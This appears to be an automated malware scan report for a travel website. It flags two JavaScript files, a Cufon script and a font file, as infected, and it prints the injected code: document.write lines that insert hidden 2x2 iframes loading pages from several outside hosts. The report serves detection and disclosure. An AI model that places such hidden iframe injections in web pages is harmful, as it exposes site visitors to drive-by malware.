Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=theistanbultravel.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://theistanbultravel.com/ | 200 OK Content-Length: 29046 Content-Type: text/html | clean |
http://theistanbultravel.com/cufon.js | 200 OK Content-Length: 18899 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://bsmartens.com/ewzs.html?j=1072991></iframe>');
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://gabriellerosephotography.com/emas.html?j=1072991></iframe>'); var Cufon=(function(){var m=function(){return m.replace.apply(null,arguments)};var x=m.DOM={ready:(function(){var C=false,E={load document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://salvadorpostigo.com/hzws.html></iframe>'); document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://morleyyachts.com/wzwi.html?i=1072991></iframe>'); Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://salvadorpostigo.com/hzws.html <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://salvadorpostigo.com/hzws.html> Hidden iFrame found. size: 2x2 src: http://bsmartens.com/ewzs.html?j=1072991 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://bsmartens.com/ewzs.html?j=1072991> Hidden iFrame found. size: 2x2 src: http://gabriellerosephotography.com/emas.html?j=1072991 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://gabriellerosephotography.com/emas.html?j=1072991> Hidden iFrame found. size: 2x2 src: http://morleyyachts.com/wzwi.html?i=1072991 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://morleyyachts.com/wzwi.html?i=1072991> | ||
http://theistanbultravel.com/Museo_400-Museo_italic_400.font.js | 200 OK Content-Length: 38985 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://bsmartens.com/ewzs.html?j=1072991></iframe>');
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://gabriellerosephotography.com/emas.html?j=1072991></iframe>'); Cufon.registerFont({"w":218,"face":{"font-family":"Museo","font-weight":400,"font-stretch":"normal","units-per-em":"360","panose- document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http:document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://morleyyachts.com/wzwi.html?i=1072991></iframe>'); Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://morleyyachts.com/wzwi.html?i=1072991 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://morleyyachts.com/wzwi.html?i=1072991> Hidden iFrame found. size: 2x2 src: http://gabriellerosephotography.com/emas.html?j=1072991 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://gabriellerosephotography.com/emas.html?j=1072991> Hidden iFrame found. size: 2x2 src: http://bsmartens.com/ewzs.html?j=1072991 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://bsmartens.com/ewzs.html?j=1072991> Hidden iFrame found. size: 2x2 src: http://salvadorpostigo.com/hzws.html <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://salvadorpostigo.com/hzws.html> | ||
http://theistanbultravel.com/l10n.js-ver=20101110 | 404 Not Found Content-Length: 1635 Content-Type: text/html | clean |
http://theistanbultravel.com/test404page.js | 404 Not Found Content-Length: 1635 Content-Type: text/html | clean |
http://theistanbultravel.com/38d81d42ef30ac1f746f9b2e7a646b40.js-ver=3.0.3 | 404 Not Found Content-Length: 1635 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: theistanbultravel.com
Result:
HTTP/1.1 200 OK
Cache-Control: private
Date: Tue, 03 Mar 2015 11:21:22 GMT
Server: Microsoft-IIS/6.0
Content-Length: 29046
Content-Type: text/html; charset=utf-8
X-AspNet-Version: 2.0.50727
X-Powered-By: PleskWin
X-Powered-By: ASP.NET
...29046 bytes of data.
GET / HTTP/1.1
Host: theistanbultravel.com
Result:
HTTP/1.1 200 OK
Cache-Control: private
Date: Tue, 03 Mar 2015 11:21:22 GMT
Server: Microsoft-IIS/6.0
Content-Length: 29046
Content-Type: text/html; charset=utf-8
X-AspNet-Version: 2.0.50727
X-Powered-By: PleskWin
X-Powered-By: ASP.NET
...29046 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: theistanbultravel.com
Referer: http://www.google.com/search?q=theistanbultravel.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: theistanbultravel.com
Referer: http://www.google.com/search?q=theistanbultravel.com
Result:
The result is similar to the first query. There are no suspicious redirects found.